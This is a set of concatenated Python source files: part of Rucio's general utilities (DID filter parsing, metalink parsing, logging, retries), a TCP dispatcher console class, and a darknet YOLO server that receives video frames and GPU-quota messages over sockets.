latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be sent
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
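# Usage sketch (hedged; the URL is illustrative): existing query parameters are
# kept and merged with the new ones (ordering follows dict insertion order).
#   >>> add_url_query('https://rucio.example.org/dids?scope=mc', {'name': 'x'})
#   'https://rucio.example.org/dids?scope=mc&name=x'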
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and a unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
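# Usage sketch (illustrative inputs): units are decimal and case-insensitive;
# anything that does not match '<digits><unit>' yields False.
#   >>> get_bytes_value_from_string('2GB')
#   2000000000
#   >>> get_bytes_value_from_string('10 TB')
#   False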
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
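# Usage sketch (illustrative filter string): 'type' selects the DID type, the
# remaining options end up in the filter dictionary.
#   >>> parse_did_filter_from_string('type=dataset,length>10')
#   ({'length.gt': 10}, 'dataset')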
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
raise DIDFilterSyntaxError("{} or {} operator not understood.".format(operator1, operator2))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
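# Usage sketch (illustrative expression): ';' separates OR groups, ',' separates
# AND terms, and the default name '*' is injected where no name is given.
#   >>> parse_did_filter_from_string_fe('length >= 4; name = user.*')
#   ([{'length.gte': '4', 'name': '*'}, {'name': 'user.*'}], 'collection')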
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds at which the action function should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(max(0.0, interval - (time.time() - starttime)))  # never pass a negative value if the action overruns the interval
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: tuple of (returncode, stdout); any stderr output is appended to stdout
"""
time_start = time.time()  # wall-clock timestamp; datetime.now().second would wrap around every minute
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
running_time = int(time.time() - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
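# Usage sketch:
#   >>> get_parsed_throttler_mode('DEST_PER_ACT')
#   ('destination', False)
#   >>> get_parsed_throttler_mode('SRC_PER_ALL_ACT')
#   ('source', True)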
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args: parameters of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
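# Usage sketch (hedged; the wrapped callable and URL are illustrative only):
#   fetch = retry(requests.get, 'https://rucio.example.org/ping', timeout=5)
#   response = fetch(mtries=3)   # re-raises the last exception if all attempts fail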
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
'''
StoreTrueAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store-true action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param default: default value of the flag
:param required: whether the argument is required
:param help: help text for the argument
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
|
Console.py
|
###############################################################################
#
#
# <legal_notice>
# * BSD License 2.0
# *
# * Copyright (c) 2021, MaxLinear, Inc.
# *
# * Redistribution and use in source and binary forms, with or without
# * modification, are permitted provided that the following conditions are met:
# * 1. Redistributions of source code must retain the above copyright notice,
# * this list of conditions and the following disclaimer.
# * 2. Redistributions in binary form must reproduce the above copyright notice,
# * this list of conditions and the following disclaimer in the documentation
# * and/or other materials provided with the distribution.
# * 3. Neither the name of the copyright holder nor the names of its contributors
# * may be used to endorse or promote products derived from this software
# * without specific prior written permission.
# *
# * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# * IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# * OR PROFITS; OR BUSINESS INTERRUPTION HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)
# * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# * POSSIBILITY OF SUCH DAMAGE.
# </legal_notice>
#
#
###############################################################################
import socket
import Config
import threading
import Log
from Singleton import singleton
from RemoteConsole import CRemoteConsole
# DEFAULT_CONSOLE_PORT = 61000
class CConsole(object):
__metaclass__ = singleton
def __init__(self):
self.__running = False
self.__consoleThread = None
self.__listenSocket = None
self.__connSocket = None
self.__connected = False
self.__consoleCommands = {}
self.__consoleMutex = threading.Lock()
self.__remoteConsole = CRemoteConsole()
def start(self, port):
result = True
if self.__running:
result = False
self.command_register("quit", self.close_connection, "Exit the console")
self.command_register("help", self.show_help, "Show this help")
if result:
try:
# Open socket
self.__running = True
self.__listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ("", port) # to connect from outside the machine
self.__listenSocket.bind(server_address)
Log.logger.info('starting up on %s port %s' % server_address)
except socket.error, v:
Log.logger.error('Exception starting console, %s' % v.strerror)
result = False
if result:
try:
self.__running = True
self.__consoleThread = threading.Thread(target=self.console_thread, args=())
self.__consoleThread.start()
except StandardError:
result = False
Log.logger.error("Error start console")
return result
def stop(self):
try:
self.__running = False
if self.__connSocket is not None:
self.__connSocket.shutdown(socket.SHUT_RDWR)
self.__connSocket.close()
if self.__listenSocket is not None:
self.__listenSocket.shutdown(socket.SHUT_RDWR)
self.__listenSocket.close()
except socket.error, v:
Log.logger.error("Error closing Console sockets. " + v.strerror)
def command_register(self, command_name, callback_func, description):
if command_name not in self.__consoleCommands:
self.__consoleCommands[command_name] = (callback_func, description)
def console_thread(self):
if not self.__running:
return
try:
# Listen for incoming connections
self.__listenSocket.listen(1)
except socket.error, v:
Log.logger.error('Socket error listening' + v.strerror)
Log.logger.info('Console initialized')
while self.__running:
try:
# Wait for a connection
self.__connSocket, client_address = self.__listenSocket.accept()
Log.logger.post(Log.LogType.Debug, "new console connection")
self.__connected = True
self.handle_connection()
except socket.error:
Log.logger.error('Exception accepting new connection')
self.__running = False
def handle_connection(self):
while self.__connected:
self.write("\ndispatcher$ ")
try:
rx_data = str(self.__connSocket.recv(4096))
rx_data = rx_data.rstrip()
if self.__running:
if self.__remoteConsole.connected:
if rx_data == "quit":
self.__remoteConsole.stop()
else:
rx_data = rx_data+"\r"
self.__remoteConsole.send(rx_data)
else:
args = rx_data.split()
if len(args) >= 1:
self.execute_command(args)
if not self.__connected or not self.__running:
self.__connSocket.shutdown(socket.SHUT_RDWR)
self.__connSocket.close()
self.__connected = False
except socket.error:
self.__connected = False
Log.logger.error("Exception receiving data")
def write(self, data):
if not self.__running or not self.__connected:
return
try:
self.__consoleMutex.acquire()
if self.__connSocket.sendall(data) is not None:
Log.logger.error("Error sending data to console")
except socket.error:
self.__connected = False
Log.logger.error('Exception sending data to console')
finally:
self.__consoleMutex.release()
def execute_command(self, args):
# print "command \"%s\" len %d type %s" % (command_name, len(command_name), type(command_name))
command_name = args[0]
if command_name in self.__consoleCommands:
(func, desc) = self.__consoleCommands[command_name]
#execute function
func(args)
self.write("\nOK")
elif command_name == "h":
self.show_help(args)
self.write("\nOK")
else:
#send error
self.write("\nKO")
def show_help(self, args):
self.write("\nList of commands:")
for command in self.__consoleCommands:
self.write("\n\t%s\t- %s" % (command, self.__consoleCommands[command][1]))
def close_connection(self, args):
self.__connected = False
def open_remote_console(self, ip, port):
return self.__remoteConsole.start(ip, port)
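# Usage sketch (hedged; the command and port are illustrative, see the commented
# DEFAULT_CONSOLE_PORT above). Command callbacks receive the tokenized argument list.
#   console = CConsole()
#   console.command_register("status", lambda args: console.write("\nrunning"), "Show dispatcher status")
#   console.start(61000)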
|
darknet1.py
|
#!python3
'''
##############################
### Receive Video stream #####
### from Android client #######
### Use YOLO to run detection #
## (return a message to the mobile device) ##
##############################
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
import sys
import pickle
import struct
import timeit
import time
import threading
import Queue
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/nano/darknet/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
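# NOTE: the prototypes above mirror the darknet C API exported by libdarknet.so. Stock
# darknet declares network_predict_image(network*, image); the extra c_int accepted by
# predict_image here (used below to pass QUATO) suggests a patched libdarknet build that
# takes a per-call GPU resource quota. This is an observation from the signatures, not verified.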
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9001
CTL_PORT=11111
BUFFER_SIZE = 256
QUATO = 100
Interval = 10
Latency = []
Count = 0
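# Control protocol (see connect_controller below): the controller sends a BUFFER_SIZE array
# of doubles whose first element is the GPU quota to apply; every `Interval` seconds this
# server replies with an array filled with the mean of its last five recorded round-trip
# latencies, which the controller presumably uses to tune the quota.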
def connect_controller():
global QUATO
global Latency
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data) <=0:
break
Latency = []
data = np.fromstring(recv_data, dtype=np.double)
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
time.sleep(Interval)
if len(Latency) ==0:
Latency.append(1e-1)
send_data = np.mean(Latency[-5:]) * np.ones(BUFFER_SIZE, dtype=np.double)
controller.sendall(send_data)
def recImage(client,data,q):
frameid = 1
while True:
        buf = b''
        while len(buf) < 4:
            buf += client.recv(4 - len(buf))
size, = struct.unpack('!i', buf)
#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
        imgdata = np.frombuffer(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
#q.put(decimg)
#print "frame %d finish offloading" % frameid
#f2 = open('/home/nvidia/Desktop/haoxin/images/newNexus320/320off/datasize320.txt','a')
#print >> f2, "%f" %size
#f2.close()
#if frameid>= 45 and frameid<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%2d.bmp" %frameid,decimg)
frameid += 1
def recv_image_from_socket(client, data):
    buf = b''
    while len(buf) < 4:
        buf += client.recv(4 - len(buf))
size, = struct.unpack('!i', buf)
